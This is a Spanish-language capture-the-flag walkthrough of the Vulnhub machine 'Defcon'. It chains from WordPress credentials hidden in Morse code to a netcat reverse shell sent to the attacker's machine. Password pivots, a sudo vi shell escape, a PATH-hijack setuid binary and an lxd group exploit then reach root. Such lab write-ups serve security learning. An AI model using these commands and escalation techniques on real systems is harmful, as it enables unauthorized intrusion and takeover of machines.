[VLN] Defcon

Hoy vamos a hackear la maquina de Vulnhub llamada Defcon. Podeis descargarla desde el siguiente enlace: Defcon

Vide0


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@m0nique:~$ nmap -A -p- 192.168.112.136
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 21:40 CEST
Nmap scan report for 192.168.112.136
Host is up (0.00096s latency).
Not shown: 65531 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  open   ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp  open   http     Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to https://nsa-server.net
222/tcp closed rsh-spx
443/tcp open   ssl/http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Job Search | Intelligence Careers
| ssl-cert: Subject: commonName=nsa-server/organizationName=National Security 
Agency/stateOrProvinceName=New-York/countryName=US
| Not valid before: 2019-06-10T14:04:18
|_Not valid after:  2019-07-10T14:04:18
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
1 service unrecognized despite returning data. If you know the service/version, 
please submit the following fingerprint at 
https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.80%I=7%D=6/14%Time=5EE67DC6%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,5,"!t>\r\n");
Service Info: Host: nsa-server

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 289.46 seconds
Al entrar a http://192.168.112.141 nos redirige a nsa-server.net, el cual no encuentra... Agregamos nsa-server.net a /etc/hosts. Una vez agregado, entramos en http://nsa-server.net. Si revisamos el certificado, en "Detalles -> Issuers" podemos ver una direccion de mail john@nsa-secretserver.net. Agregamos tambien nsa-secretserver.net a /etc/hosts. Visitamos https://nsa-secretserver.net/ Si vemos la "animacion" de la consola que nos aparece en la pagina principal, justo al final podremos ver:

DATA EXFILTRATION STARTING……………………..
-/..../.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/
..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.
--/-.-.--

END OF TRANSMISSION!
REBOOTING SYSTEM…………………………
Parece codigo morse, asi que vamos a tratar de ver que dice. Lo primero es eliminar el caracter "\". El caracter "/" lo podemos mantener, o reemplazarlo por un espacio. Quedaria de la siguiente forma:

- .... . .-- --- .-. -.. .--. .-. . ... ... .--. .- ... ... .-- --- .-. -.. --- 
..-. .--- --- .... -. .. ... ... - .---- .-.. .-.. ...-- .- ... -.-- -.-.-- 
-.-.-- -.-.--
Una vez con el codigo morse "limpio" vamos a la siguiente web y hacemos la traduccion. https://morsecode.world/international/translator.html El resultado es:

THEWORDPRESSPASSWORDOFJOHNISST1LL3ASY!!!
Si miramos bien, nos indica que los credenciales para acceder al Wordpress son: JOHN/ST1LL3ASY!!! Sabiendo esto vamos a https://nsa-secretserver.net/wp-admin y nos logueamos con los credenciales que hemos conseguido. Vamos a: WORDPRESS -> TOOLS -> WPTERM Tenenemos acceso a una terminal :) Ponemos nc en la escucha en nuestra maquina.

sml@m0nique:~$ nc -nlvp 5555
listening on [any] 5555 ...
En la terminal "web" ejecutamos:

graham:/var/www/wordpress $ nc -e /bin/bash 192.168.112.128 5555
Y obtenemos la reverse shell.

Graham to John



sml@m0nique:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.112.128] from (UNKNOWN) [192.168.112.136] 49098
python3 -c 'import pty; pty.spawn("/bin/bash");'
graham@nsa-server:/home/graham$
Exploramos un poco el sistema, y en el fichero mbox del directorio de graham podemos ver lo siguiente:

graham@nsa-server:/home/graham$ cat mbox

From john@nsa-server Mon Jun 10 11:35:48 2019
Return-path: 
Envelope-to: graham@nsa-server
Delivery-date: Mon, 10 Jun 2019 11:35:48 +0200
Received: from john by nsa-server with local (Exim 4.89)
        (envelope-from )
        id 1haGiS-0004Sh-6R
        for graham@nsa-server; Mon, 10 Jun 2019 11:35:48 +0200
To: 
Subject: password problems
X-Mailer: mail (GNU Mailutils 3.1.1)
Message-Id: 
From: john@nsa-server
Date: Mon, 10 Jun 2019 11:35:48 +0200

Hi Graham,

Sorry man to bother you, but I forgot my password.
I don't want to go to Smith because he will rip me a new hole.
Can you please help me?

Thanks man!!!

John
Parece que "john" ha olvidado la password. Seguimos investigando el sistema y miramos el fichero .viminfo.

graham:/home/graham $ cat .viminfo
---SNIP---
# This viminfo file was generated by Vim 8.0.
# You may edit it if you're careful!

# Debug Line History (newest to oldest):

# Registers:
""1	LINE	0
	export SSLKEYLOGFILE=/home/graham/master.log
|3,1,1,1,1,0,1557842873,"export SSLKEYLOGFILE=/home/graham/master.log"

# File marks:
'0  20  0  ~/.local/share/Trash/files/note.txt
|4,48,20,0,1560159846,"~/.local/share/Trash/files/note.txt"
----SNIP----
Al parecer ha estado editando el fichero note.txt.. Lo revisamos.

graham@nsa-server:/home/graham$ cat ~/.local/share/Trash/files/note.txt
cat ~/.local/share/Trash/files/note.txt
Hi John,

After your latest password failure I changed it. You know where it is right? 
Wink Wink!
Pretty easy right? Try not to forget this one also.
You know how the boss is like! You wanna get fired or something?

Also smart idea to sent this message with netcat right?
I don't trust our mailsystem.
After sending this message, I'll trow it away....no one will know.

hahahaha......now who is a cybernoob!!!!

Best,

Graham

P.S. You Do kNow whEre The paSswoRd Is hiDden rigHt?
Despues de mirar bien el mensaje, vemos que el password de john son las letras "mayusuclas" que aparecen en P.S, asi que el password de john es YDNETSRIDH. Teniendo estos credenciales, nos cambiamos al usuario john.

graham@nsa-server:/home/graham$ su john
Miramos si john puede hacer algo con sudo.

john@nsa-server:~$ sudo -l
sudo -l
Matching Defaults entries for john on nsa-server:
    env_reset, mail_badpass,
    
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User john may run the following commands on nsa-server:
    (ALL) PASSWD: /bin/systemctl start ssh, /bin/systemctl stop ssh,
        /bin/systemctl status ssh
Podemos arrancar ssh asi que lo arrancamos :)

john@nsa-server:~$ sudo /bin/systemctl start ssh
Miramos en que puerto se ejecuta.

john@nsa-server:~$ netstat -ntlp
netstat -ntlp                                                                   
                                                            
(Not all processes could be identified, non-owned process info                  
                                                            
 will not be shown, you would have to be root to see it all.)                   
                                                            
Active Internet connections (only servers)                                      
                                                            
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
PID/Program name                                                                
     
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      
-                                                                               
     
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      
-                                                                               
     
tcp        0      0 10.14.185.1:53          0.0.0.0:*               LISTEN      
-                                                                               
     
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      
-                                                                               
     
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      
-                                                                               
     
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      
-                                                                               
     
tcp        0      0 0.0.0.0:222             0.0.0.0:*               LISTEN      
-  
Vemos que se ejecuta en el puerto 222, asi que nos logueamos como john usando ssh.

John to George



sml@m0nique:~$ ssh john@192.168.112.136 -p 222
john@192.168.112.136's password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) 
x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Wed Apr 22 13:16:25 2020 from 192.168.20.131
john@nsa-server:~$
Tras explorar el sistema como john, vemos un fichero curioso en /home/john/Documents que se llama secret.png. Lo copiamos a nuestra maquina.

sml@m0nique:~$ scp -P 222 john@192.168.112.136:/home/john/Documents/secret.png .
Miramos de que tipo de fichero se trata.

sml@m0nique:~$ file secret.png
secret.png: PDF document, version \012.\012
La extension es .png sin embargo, el comando "file" nos indica que se trata de un documento PDF. Abrimos el fichero con GHEX, modificamos el HEADER por: 89 50 4E 47 0D 0A 1A 0A, es decir el Header de un PNG. Una vez cambiado el Header, guardamos y podemos abrir el fichero como una imagen. Vemos que la password es: 2W3dsF5tGh-Kl#1 Tras probar con los usuarios del sistema, la clave es del usuario george. Nos conectamos como george...

George to Samantha



sml@m0nique:~$ ssh george@192.168.112.136 -p 222
george@192.168.112.136's password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) 
x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 22 13:56:10 2020 from 192.168.20.131
Miramos que puede hacer con sudo.

george@nsa-server:~$ sudo -l
[sudo] password for george:                                                     
                                                                                
Matching Defaults entries for george on nsa-server:                             
 env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin   
User george may run the following commands on nsa-server:                                                                                                        
    (samantha) /usr/bin/vi                                                                                                                                        
Vemos que puede ejecutar vi como samantha. Lo hacemos.

george@nsa-server:~$ sudo -u samantha /usr/bin/vi
Y para obtener una shell como samantha usando vi:

:!/bin/bash

Samantha to Nicky


En la home de samantha podemos ver un fichero interesante, check.

samantha@nsa-server:~$ cd /home/samantha
samantha@nsa-server:~$ ls -l                                                                                                                                    
total 60                                                                           
-rwsr-xr-x 1 root     root     8792 Apr 10 16:17 check   
Al ejecutarlo, vemos que es la salida del comando "ss"

samantha@nsa-server:~$ strings check
---SNIP---
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
puts
system
__cxa_finalize
setgid
__libc_start_main
ss -tupan
.comment
Tras mirar con strings, vemos que no usa la ruta completa para ejecutar ss... Sabiendo esto, vamos a usar un "ss" que nos otorgara una shell. Primero, agregamos a la variable PATH que busque nuestro directorio actual para que antes de ejecutar el "ss" autentico, ejecute el falso.

samantha@nsa-server:~$ export PATH=.:$PATH
samantha@nsa-server:~$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
En nuestra maquina preparamos el ss "falso".

samantha@nsa-server:~$ cat ss.c
#include 
#include 
#include 
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}
samantha@nsa-server:~$ gcc -o ss ss.c
ss.c: In function ‘main’:
ss.c:7:1: warning: implicit declaration of function ‘system’ 
[-Wimplicit-function-declaration]
 system("/bin/bash");
 ^~~~~~
Lo compilamos y damos los permisos correspondientes.

samantha@nsa-server:~$ chmod u+s ss
samantha@nsa-server:~$ chmod +x ss
Por ultimo, ejecutamos!

samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:

bash-4.4$ id
uid=1007(nicky) gid=1007(nicky) groups=1007(nicky),1006(samantha)

Nicky to Root


Bien, ahora que somos "nicky" exploramos el sistema.

bash-4.4$ cd /home/nicky/Documents
bash-4.4$ ls -la
total 12
drwxr-xr-x  2 nicky nicky 4096 Apr 22 14:54 .
drwxr-x--- 10 nicky nicky 4096 Apr 10 17:01 ..
-rw-r--r--  1 nicky nicky   14 Apr 22 14:54 .passwd
bash-4.4$ cat .passwd
We_iuh#-qaSW1
Parece que hemos encontrado su password :) La usamos para conectarnos por ssh como nicky.

sml@m0nique:~$ ssh nicky@192.168.112.136 -p 222
nicky@192.168.112.136's password: 
nicky@nsa-server:~$
Miramos si nicky puede conectarse al mysql.

nicky@nsa-server:~$ mysql -u nicky -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 45
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
Estamos dentro de mysql :) Exploramos las BBDD.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.01 sec)
Elegimos la BBDD mysql.

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
Miramos que tablas hay.

MariaDB [mysql]> show tables;
+---------------------------+
| Tables_in_mysql           |
+---------------------------+
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
+---------------------------+
30 rows in set (0.00 sec)
Hay una tabla curiosa, llamada user. Le echamos un vistazo.

MariaDB [mysql]> select * from user;
---SNIP---
+-----------+---------+------
| Host      | User    | Password  
+-----------+---------+-------------
| localhost | admin   | *6B6D111D0EC8D42C2955E082DD087C3E56B17F98 |
| %         | smith   | *BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13 |
| localhost | nicky   | *75961C95665DC2BAC3F947AF4C60FD73564BCFE2 | 
+-----------+---------+-------------------------------------------- 
---SNIP---
5 rows in set (0.00 sec)
Vemos que aparece el usuario smith... Buscamos el hash/password en google... Nos manda a: https://twitter.com/onlinehashcrack/status/287432972456562689 en el cual se puede ver que la password es: abygurl69 Nos logueamos como el usuario smith. Vemos que smith esta en el grupo lxc. Buscamos el ejecutable "lxc" y agregamos la ruta a nuestra variable $PATH.

smith@nsa-server:~$ whereis lxc
lxc:
smith@nsa-server:~$ clear
smith@nsa-server:~$ find / -name lxc 2>/dev/null
/etc/bash_completion.d/lxc
/usr/share/bash-completion/completions/lxc
/var/snap/lxd/common/lxc
/snap/bin/lxc
/snap/lxd/10756/bin/lxc
/snap/lxd/10756/commands/lxc
/snap/lxd/10756/lxc
/home/smith/snap/lxd/10756/.config/lxc
smith@nsa-server:~$ export PATH=/snap/bin:$PATH
En /home/smith vemos un script sh llamado lxd-exploit el cual puede funcionar... Al ejecutarlo sin parametros nos dice que necesita el nombre del container...

smith@nsa-server:~$ sh lxd-exploit.sh 
lxd-exploit.sh 
The exploit currently requires an existing container.
Miramos el nombre de los containers que hay.

smith@nsa-server:~$ lxc list
+---------+---------+------+------+------------+-----------+
|  NAME   |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
+---------+---------+------+------+------------+-----------+
| nsa-lab | STOPPED |      |      | PERSISTENT |           |
+---------+---------+------+------+------------+-----------+
Vemos que hay una maquina llamada nsa-lab. Sabien que el nombre de maquina es nsa-lab, ejecutamos el exploit.

smith@nsa-server:~$ sh lxd-exploit.sh nsa-lab
[+] Stopping container nsa-lab
Error: The container is already stopped
[+] Setting container security privilege on
[+] Starting container nsa-lab
[+] Mounting host root filesystem to nsa-lab
Device rootdisk added to nsa-lab
[+] Using container to add smith to /etc/sudoers
[+] Unmounting host root filesystem from nsa-lab
Device rootdisk removed from nsa-lab
[+] Resetting container security privilege to off
[+] Stopping the container
[+] Done! Enjoy your sudo superpowers!
Vamos a disfrutar de nuestros superpoderes sudo!

Privilege Escalation



smith@nsa-server:~$ sudo su
root@nsa-server:/home/smith#
Y ya con root, terminamos de explorar...

root.txt



root@nsa-server:~# ls
clean.sh  Documents  endlessh  names     Public    snap       thinclient_drives
Desktop   Downloads  Music     Pictures  root.txt  Templates  Videos
root@nsa-server:~# cat root.txt

CONGRATULATIONS!!!!

YOU JUST PWND THIS MACHINE

End


Y con esto ya seriamos root de la maquina :)